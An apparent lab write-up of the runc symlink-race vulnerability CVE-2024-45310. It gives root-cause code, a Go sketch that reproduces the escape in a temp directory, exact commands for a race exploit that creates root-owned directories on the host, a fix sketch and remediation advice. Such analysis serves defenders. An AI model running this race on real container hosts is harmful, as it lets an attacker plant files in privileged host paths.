CVE-2024-45310: runc symlink-race host inode creation

Published 2026-06-06

Summary

A container-side attacker can trick runc into creating an empty file or directory at any path on the host filesystem by winning a symlink-swap race inside a shared volume.

Field               Value
Project             runc
Affected component  libcontainer/rootfs_linux.go: createMountpoint / createIfNotExists / mountCgroupV1 / mountToRootfs / createDeviceNode
Severity            LOW
CVSS                CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N (3.6)
CWE                 CWE-363, CWE-61
Affected versions   < 1.1.14; >= 1.2.0-rc.1, < 1.2.0-rc.3
Fixed version       v1.1.14; v1.2.0-rc.3
Advisory            GHSA-jfvp-7x6p-h2pv

1. Vulnerability overview

runc is the low-level container runtime that underlies Docker, containerd, Kubernetes, and most other OCI-based container platforms. CVE-2024-45310 allows an attacker who controls the contents of a volume shared into a container to cause runc (executing as host root) to create an empty file or empty directory at any path on the host filesystem. The attacker cannot read existing files, overwrite them, or write data; only new, empty inodes can be created. That constraint limits the impact, but the primitive is still useful: an attacker could pre-create files that a privileged process later opens for writing, inject entries into directories that programs treat as trusted (e.g. /etc/cron.d), or interfere with existence-check logic.

Root cause

The bug is a time-of-check/time-of-use (TOCTOU) race in how runc prepares mount destinations inside a container rootfs. In libcontainer/rootfs_linux.go (and several helper functions it calls), runc computes the absolute host path for a bind-mount target by calling securejoin.SecureJoin(rootfs, m.Destination). SecureJoin resolves all symlinks at the moment it is called and returns a plain string. runc then passes that string to os.MkdirAll, a second, separate call that does its own path traversal from scratch:

// BEFORE (vulnerable)
dest, err := securejoin.SecureJoin(rootfs, m.Destination) // returns a string
// ...
if err := os.MkdirAll(dest, 0o755); err != nil {           // no longer safe — symlink race here
    return err
}

Between those two calls there is a window. If an attacker controls a directory component along the resolved path (for example, because it sits inside a world-writable volume shared into the container), they can replace it with a symlink to an arbitrary host path in that window. When os.MkdirAll runs, it follows the symlink and creates the target directory on the host rather than inside the rootfs.
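The window can be reproduced deterministically, without any real race, by performing the swap by hand between the resolve step and the create step. The following is a minimal sketch under stated assumptions: filepath.EvalSymlinks stands in for securejoin.SecureJoin (it is not the same function), the directory names mirror the lab layout but live in a throwaway temp directory, and demoStringPathRace is a hypothetical helper, not part of runc.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
)

// demoStringPathRace resolves a destination to a plain string, swaps one path
// component for a symlink, then calls os.MkdirAll on the stale string.
// It reports whether the new directory landed outside the pretend rootfs.
func demoStringPathRace(base string) (bool, error) {
	rootfs := filepath.Join(base, "rootfs")
	outside := filepath.Join(base, "host-target")
	target := filepath.Join(rootfs, "share", "target")
	if err := os.MkdirAll(target, 0o755); err != nil {
		return false, err
	}
	if err := os.Mkdir(outside, 0o755); err != nil {
		return false, err
	}

	// "Check": resolve symlinks once and keep only a string.
	// (Stand-in for securejoin.SecureJoin; an assumption of this sketch.)
	resolved, err := filepath.EvalSymlinks(target)
	if err != nil {
		return false, err
	}
	dest := filepath.Join(resolved, "gift")

	// Attacker's move, placed by hand between check and use.
	if err := os.Remove(target); err != nil {
		return false, err
	}
	if err := os.Symlink(outside, target); err != nil {
		return false, err
	}

	// "Use": MkdirAll re-walks the string and follows the new symlink.
	if err := os.MkdirAll(dest, 0o755); err != nil {
		return false, err
	}

	_, err = os.Lstat(filepath.Join(outside, "gift"))
	return err == nil, nil
}

func main() {
	base, err := os.MkdirTemp("", "toctou-demo-")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	defer os.RemoveAll(base)

	escaped, err := demoStringPathRace(base)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		return
	}
	fmt.Println("created outside rootfs:", escaped)
}
```

In the real bug the swap has to land inside a very short window, which is why the exploit needs many iterations; the sketch only shows that a resolved string carries no guarantee once the filesystem changes underneath it.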

The fix, introduced in runc v1.1.14 and v1.2.0-rc.3 (patch commits 63c2908, 8781993, f0b652e), replaces every call to os.MkdirAll on a rootfs-relative path with a new function utils.MkdirAllInRoot(root, unsafePath, mode):

// AFTER (fixed) — representative call site
if err := utils.MkdirAllInRoot(rootfs, dest, 0o755); err != nil {
    return err
}

MkdirAllInRoot opens the root directory as a file descriptor and walks each path component using openat(O_NOFOLLOW) combined with mkdirat. Because every step is anchored to a real file descriptor rather than a string, a symlink swap mid-walk causes openat to return ENOTDIR instead of silently following the link out of the rootfs. For regular file creation (bind-mount target stubs), the analogous fix replaces os.OpenFile with unix.Mknodat, which similarly does not follow a trailing symlink.
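The descriptor-anchored walk described above can be sketched with the standard library's Linux syscall wrappers. This is an illustrative simplification, not runc's implementation: mkdirAllAnchored, setupTrap, and exists are hypothetical names, the sketch rejects every symlink and every ".." component outright, and it omits the additional checks a production implementation needs.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
	"syscall"
)

// mkdirAllAnchored creates rel beneath root one component at a time.
// Each step is relative to an open directory descriptor, never to a string.
func mkdirAllAnchored(root, rel string, mode uint32) error {
	dirFlags := syscall.O_RDONLY | syscall.O_DIRECTORY | syscall.O_NOFOLLOW | syscall.O_CLOEXEC
	fd, err := syscall.Open(root, syscall.O_RDONLY|syscall.O_DIRECTORY|syscall.O_CLOEXEC, 0)
	if err != nil {
		return fmt.Errorf("open root: %w", err)
	}
	for _, part := range strings.Split(rel, "/") {
		if part == "" || part == "." {
			continue
		}
		if part == ".." {
			syscall.Close(fd)
			return fmt.Errorf("refusing %q component", part)
		}
		// mkdirat does not follow a trailing symlink; EEXIST only means
		// that some entry with this name is already present.
		if err := syscall.Mkdirat(fd, part, mode); err != nil && err != syscall.EEXIST {
			syscall.Close(fd)
			return fmt.Errorf("mkdirat %s: %w", part, err)
		}
		// O_NOFOLLOW|O_DIRECTORY makes the open fail if the entry is a symlink.
		next, err := syscall.Openat(fd, part, dirFlags, 0)
		syscall.Close(fd)
		if err != nil {
			return fmt.Errorf("openat %s: %w", part, err)
		}
		fd = next
	}
	return syscall.Close(fd)
}

// setupTrap builds base/rootfs/share/target as a symlink to base/host-target.
func setupTrap(base string) (rootfs, outside string, err error) {
	rootfs = filepath.Join(base, "rootfs")
	outside = filepath.Join(base, "host-target")
	if err = os.MkdirAll(filepath.Join(rootfs, "share"), 0o755); err != nil {
		return
	}
	if err = os.Mkdir(outside, 0o755); err != nil {
		return
	}
	err = os.Symlink(outside, filepath.Join(rootfs, "share", "target"))
	return
}

func exists(path string) bool {
	_, err := os.Lstat(path)
	return err == nil
}

func main() {
	base, err := os.MkdirTemp("", "anchored-demo-")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	defer os.RemoveAll(base)

	rootfs, outside, err := setupTrap(base)
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		return
	}
	err = mkdirAllAnchored(rootfs, "share/target/gift", 0o755)
	fmt.Println("walk error:", err)
	fmt.Println("escaped:", exists(filepath.Join(outside, "gift")))
}
```

With the symlink already in place, the walk stops at the swapped component and nothing is created under the outside directory. A real implementation would typically also resolve legitimate in-root symlinks rather than refusing them, which this sketch does not attempt.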


2. Vulnerable environment

The environment runs a single privileged Linux container (ubuntu:22.04) as the inner "host": the machine on which runc is installed and runs. runc v1.1.13 (the last vulnerable release) is installed from its official release binary, with its SHA256 verified at build time. Nested containers are launched by runc inside this inner host; the CVE causes inodes to appear on the inner host's own filesystem, outside any nested container rootfs.

The environment files are available for download.

Layout inside the inner host

Path                  Purpose
/usr/local/sbin/runc  Vulnerable runc 1.1.13 binary
/opt/oci-rootfs       BusyBox rootfs; copied per OCI bundle
/srv/share-backing    World-writable (mode 0777) shared volume backing; the attacker's race surface
/host-target          The exploit target directory on the host, outside both the shared volume and any nested container rootfs; empty at clean baseline

Standing up the environment

docker compose -f env/docker-compose.yml up -d --wait

Verify the environment is in the expected state:

docker compose -f env/docker-compose.yml ps --format '{{.Name}} {{.Status}}'
docker exec cve-2024-45310-innerhost /usr/local/sbin/runc --version | head -n1
# Expected: runc version 1.1.13

docker exec cve-2024-45310-innerhost sh -c \
  'test -d /host-target && [ -z "$(ls -A /host-target)" ] && echo "host-target clean"; ls -ld /srv/share-backing'
# Expected: "host-target clean" and drwxrwxrwx on /srv/share-backing

The container's entrypoint.sh empties /host-target on every start, so restarting the container restores a clean baseline:

docker compose -f env/docker-compose.yml restart innerhost

3. How to exploit

The exploit is a two-part shell script: exploit/run.sh (outer driver, run on the host) and exploit/inner.sh (race engine, injected into the inner-host container). Both files are available for download.

How the race works

inner.sh does three things concurrently inside the inner-host container:

  1. Bundle builder: assembles a minimal OCI bundle (config.json) whose second bind-mount specifies a destination of /share/target/gift, where /share is a bind of the attacker-controlled /srv/share-backing.
  2. Background swapper: runs a tight loop alternating /srv/share-backing/target between a real directory and a symlink pointing to /host-target. This is the race bait.
  3. Foreground launcher: repeatedly calls runc run and runc delete against the bundle. Each invocation drives runc through createMountpoint → securejoin.SecureJoin → os.MkdirAll on the resolved string path.

When the swapper wins the race (when the symlink is in place at the exact moment os.MkdirAll traverses the path), runc follows the symlink and creates /host-target/gift on the host rather than inside the bundle rootfs.
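For orientation, the two bind-mount entries that the bundle builder places in config.json can be sketched as follows. The field names follow the OCI runtime spec's mounts array; the source of the second mount is not stated in this write-up, so /tmp/leaf-src is a hypothetical placeholder, as are the mount options and the helper name raceMounts.

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
)

// mount mirrors one entry of the "mounts" array in an OCI config.json.
type mount struct {
	Destination string   `json:"destination"`
	Type        string   `json:"type"`
	Source      string   `json:"source"`
	Options     []string `json:"options"`
}

// raceMounts returns the two bind mounts described above: the shared volume
// first, then a mount whose destination lies inside that shared volume.
func raceMounts(shareBacking, leafSource string) []mount {
	return []mount{
		{
			Destination: "/share",
			Type:        "bind",
			Source:      shareBacking,
			Options:     []string{"bind", "rw"}, // assumed options
		},
		{
			// runc must create this mountpoint, which is what triggers
			// the directory-creation code path.
			Destination: "/share/target/gift",
			Type:        "bind",
			Source:      leafSource, // hypothetical placeholder
			Options:     []string{"bind", "rw"},
		},
	}
}

func main() {
	out, err := json.MarshalIndent(raceMounts("/srv/share-backing", "/tmp/leaf-src"), "", "  ")
	if err != nil {
		fmt.Fprintln(os.Stderr, err)
		os.Exit(1)
	}
	fmt.Println(string(out))
}
```

The ordering matters for the scenario: the first mount makes the attacker-controlled directory visible under the rootfs, and the second forces runc to create a mountpoint beneath it.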

Steps

Step 1: Confirm clean baseline

docker exec cve-2024-45310-innerhost stat -c '%n %U:%G %F' /host-target/gift
# Expected: stat: cannot statx '/host-target/gift': No such file or directory

Step 2: Run the exploit

bash exploit/run.sh cve-2024-45310-innerhost /srv/share-backing /host-target gift 6000

Argument     Value used                Meaning
CONTAINER    cve-2024-45310-innerhost  Inner-host container name
SHARE        /srv/share-backing        World-writable race surface inside the container
HOST_TARGET  /host-target              Target directory outside rootfs and share backing
LEAF         gift                      Leaf directory name the bind-mount destination creates
ITERS        6000                      Maximum runc run iterations before giving up

The script exits as soon as /host-target/gift appears. In the verified run it completed at iteration 614 in under 5 seconds. Typical output:

WON race at iteration 614: /host-target/gift created
iterations=614
total 12
drwxr-xr-x 3 root root 4096 ... .
drwxr-xr-x 1 root root 4096 ... ..
drwxr-xr-x 2 root root 4096 ... gift

Step 3: Verify through the independent observation channel

The script's stdout is not the authoritative proof. The exploit does not write directly to /host-target; only runc (as host root) can. The authoritative check is a privileged host-side stat, performed from outside the exploit:

docker exec cve-2024-45310-innerhost stat -c '%n %U:%G %F' /host-target/gift

Observed output from the verified run:

/host-target/gift root:root directory

This confirms all three required conditions:

  1. Existence, absent at baseline: /host-target/gift was No such file or directory before the exploit ran.
  2. Owner is host-root: root:root proves runc created the inode (not the unprivileged attacker); the attacker has no write route to /host-target outside of runc.
  3. Outside rootfs and outside shared volume: the inode number 33687783 is distinct from /srv/share-backing/target (inode 33687784), and the path sits under /host-target, a sibling of both /srv/share-backing and /opt/oci-rootfs.

Additional inode-distinctness check from the verified run:

stat -c '%i %n' /host-target/gift          → 33687783 /host-target/gift
stat -c '%i %n' /srv/share-backing/target  → 33687784 /srv/share-backing/target
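
The three checks can also be scripted. The following is a rough sketch, assuming a Linux host and that it runs inside the inner-host container; statFacts and sameInode are hypothetical helper names. Unlike the stat commands above, it compares the device number together with the inode number, since inode numbers are only unique within one filesystem.

```go
package main

import (
	"fmt"
	"os"
	"syscall"
)

// inodeFacts holds the properties the verification step cares about.
type inodeFacts struct {
	Dev   uint64
	Ino   uint64
	UID   uint32
	IsDir bool
}

// statFacts inspects path without following a trailing symlink.
func statFacts(path string) (inodeFacts, error) {
	fi, err := os.Lstat(path)
	if err != nil {
		return inodeFacts{}, err
	}
	st, ok := fi.Sys().(*syscall.Stat_t)
	if !ok {
		return inodeFacts{}, fmt.Errorf("no raw stat data for %s", path)
	}
	return inodeFacts{
		Dev:   uint64(st.Dev),
		Ino:   uint64(st.Ino),
		UID:   st.Uid,
		IsDir: fi.IsDir(),
	}, nil
}

// sameInode reports whether a and b refer to the same filesystem object.
func sameInode(a, b inodeFacts) bool {
	return a.Dev == b.Dev && a.Ino == b.Ino
}

func main() {
	// Defaults mirror the paths used in this walkthrough.
	created, decoy := "/host-target/gift", "/srv/share-backing/target"
	if len(os.Args) == 3 {
		created, decoy = os.Args[1], os.Args[2]
	}
	c, err := statFacts(created)
	if err != nil {
		fmt.Fprintln(os.Stderr, "not created:", err)
		os.Exit(1)
	}
	d, err := statFacts(decoy)
	if err != nil {
		fmt.Fprintln(os.Stderr, "cannot stat decoy:", err)
		os.Exit(1)
	}
	fmt.Printf("dir=%t rootOwned=%t distinctFromDecoy=%t\n",
		c.IsDir, c.UID == 0, !sameInode(c, d))
}
```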

Environment teardown

docker compose -f env/docker-compose.yml down -v

The created inode lives only on the inner-host container's filesystem. A docker compose restart or down -v removes it entirely; there are no side effects on the outer host.


4. Security advice

Remediation

Upgrade runc to v1.1.14 (stable) or v1.2.0-rc.3 (release candidate). Both releases replace every bare os.MkdirAll call on rootfs-relative paths with utils.MkdirAllInRoot, which uses openat(O_NOFOLLOW) and mkdirat to walk the path without ever releasing the file-descriptor anchor, closing the symlink-substitution window entirely.

Container runtimes that bundle their own runc (Docker Engine, containerd, CRI-O) should be updated to versions that ship runc ≥ 1.1.14.
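
When auditing a fleet, the affected ranges from the summary table can be checked mechanically against the version string reported by runc --version. The following is a minimal sketch, assuming version strings of the form MAJOR.MINOR.PATCH with an optional -rc.N suffix; parseVersion, less, and isAffected are hypothetical helpers, and other suffixes (for example +dev builds) are rejected rather than guessed at.

```go
package main

import (
	"fmt"
	"math"
	"strconv"
	"strings"
)

// version is MAJOR.MINOR.PATCH plus a release-candidate number.
type version struct{ major, minor, patch, rc int }

// finalRelease sorts a final release after every release candidate.
const finalRelease = math.MaxInt32

func parseVersion(s string) (version, error) {
	core, pre, hasPre := strings.Cut(strings.TrimPrefix(strings.TrimSpace(s), "v"), "-")
	parts := strings.Split(core, ".")
	if len(parts) != 3 {
		return version{}, fmt.Errorf("want MAJOR.MINOR.PATCH, got %q", s)
	}
	var n [3]int
	for i, p := range parts {
		x, err := strconv.Atoi(p)
		if err != nil {
			return version{}, fmt.Errorf("bad component %q in %q", p, s)
		}
		n[i] = x
	}
	v := version{n[0], n[1], n[2], finalRelease}
	if hasPre {
		// Accept both "rc.2" and "rc2".
		num := strings.TrimPrefix(strings.TrimPrefix(pre, "rc"), ".")
		rc, err := strconv.Atoi(num)
		if err != nil || !strings.HasPrefix(pre, "rc") {
			return version{}, fmt.Errorf("unsupported pre-release %q", pre)
		}
		v.rc = rc
	}
	return v, nil
}

// less orders versions field by field.
func less(a, b version) bool {
	x := [4]int{a.major, a.minor, a.patch, a.rc}
	y := [4]int{b.major, b.minor, b.patch, b.rc}
	for i := range x {
		if x[i] != y[i] {
			return x[i] < y[i]
		}
	}
	return false
}

// isAffected applies the ranges: < 1.1.14, or >= 1.2.0-rc.1 and < 1.2.0-rc.3.
func isAffected(s string) (bool, error) {
	v, err := parseVersion(s)
	if err != nil {
		return false, err
	}
	stableFix := version{1, 1, 14, finalRelease}
	rcFirst := version{1, 2, 0, 1}
	rcFix := version{1, 2, 0, 3}
	return less(v, stableFix) || (!less(v, rcFirst) && less(v, rcFix)), nil
}

func main() {
	for _, s := range []string{"1.1.13", "1.1.14", "1.2.0-rc.2", "1.2.0-rc.3"} {
		affected, err := isAffected(s)
		fmt.Println(s, affected, err)
	}
}
```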

Mitigations and workarounds

If an immediate upgrade is not possible:

  • Avoid untrusted shared volumes. The attack requires an attacker-controlled path component inside a world-writable directory that is also bind-mounted into a container as a volume. Restricting which directories can be shared as volumes, and ensuring shared volumes are not world-writable, significantly raises the bar.
  • Rootless runc / user-namespace containers. Since the exploit works by causing runc (running as root) to create inodes on the host, running containers in rootless mode (where runc runs as an unprivileged user) limits the blast radius to paths writable by that user.

The vulnerability was publicly disclosed without embargo on 2024-09-03, given its low CVSS 3.1 score of 3.6. No weaponised public PoC was circulating at the time of disclosure.
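
As a small aid for the shared-volume mitigation, candidate volume directories can be screened for the world-writable bit before they are bind-mounted into containers. This is only a sketch: worldWritable is a hypothetical helper, it inspects a single directory rather than the whole tree, and a clean result does not by itself show that a volume is safe to share.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
)

// worldWritable reports whether the permission bits grant write access
// to users who are neither the owner nor in the owning group.
func worldWritable(mode fs.FileMode) bool {
	return mode.Perm()&0o002 != 0
}

func main() {
	// Default mirrors the lab's shared-volume backing directory.
	paths := os.Args[1:]
	if len(paths) == 0 {
		paths = []string{"/srv/share-backing"}
	}
	for _, p := range paths {
		fi, err := os.Stat(p)
		if err != nil {
			fmt.Fprintln(os.Stderr, err)
			continue
		}
		fmt.Printf("%s mode=%s worldWritable=%t\n", p, fi.Mode().Perm(), worldWritable(fi.Mode()))
	}
}
```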

References